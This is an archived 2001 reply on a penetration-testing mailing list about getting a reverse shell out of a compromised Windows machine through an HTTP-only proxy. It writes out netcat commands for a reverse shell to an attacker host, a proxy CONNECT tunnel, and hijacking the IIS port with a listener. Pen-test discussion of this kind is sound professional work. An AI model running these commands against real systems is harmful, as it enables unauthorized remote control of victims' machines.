Home page logo

pen-test logo Penetration Testing mailing list archives

Re: Reverse Http Shell Solution
From: "Jody Melbourne" <jody.melbourne () itacsecurity com>
Date: Fri, 19 Oct 2001 12:30:36 +1000


Does anybody know any solution based on the remote shell in Win32
machines using Reverse Telnet thru Proxies?
The proxy only permits HTTP 80/8080.

I think your situation is this: You have owned a machine which is behind a
firewall, and it only allows connections out via a proxy, so simple reverse
telnet techniques such as 'nc.exe -e cmd.exe myip myport' fail.

You could try something like this:

Attacker: netcat -v -l -p 80

Victim: echo CONNECT attacker:80 HTTP/1.1 | netcat proxyserver 8080 -e

The HTTP/1.1 CONNECT method is the only way I can see you getting a nice
interactive command prompt if ports 80/8080 outbound are all you have to
play with. Remember that netcat can bind in FRONT of the existing IIS
process. If you spawn as netcat listener on 80, 443, 21, etc.. with the '-l'
(listen once) option, the next person to connect to that port will get the
netcat listener. Any subsequent connections will see the IIS service.



This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]